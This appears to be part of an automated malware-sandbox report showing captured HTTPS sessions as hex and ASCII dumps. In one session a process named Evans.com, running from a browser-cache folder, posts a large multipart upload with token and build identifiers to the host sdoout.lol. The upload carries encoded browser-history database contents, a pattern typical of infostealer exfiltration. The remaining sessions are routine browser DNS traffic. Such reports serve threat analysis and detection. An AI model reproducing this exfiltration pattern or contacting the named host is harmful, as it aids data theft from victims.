                                                                                                                                                                                                                                                                                                                                    Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                                                                    Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                                                                    Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                                                                    Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                                                                    Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    24192.168.2.550059116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----f3oppzctjectjekx4opz
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 207993
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 66 33 6f 70 70 7a 63 74 6a 65 63 74 6a 65 6b 78 34 6f 70 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 66 33 6f 70 70 7a 63 74 6a 65 63 74 6a 65 6b 78 34 6f 70 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 66 33 6f 70 70 7a 63 74 6a 65 63 74 6a 65 6b 78 34 6f 70 7a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------f3oppzctjectjekx4opzContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------f3oppzctjectjekx4opzContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------f3oppzctjectjekx4opzCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                                                                    Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:33 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    25192.168.2.550065162.159.61.34436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:32 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8fa8ffef894c426d-EWR
                                                                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 24 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
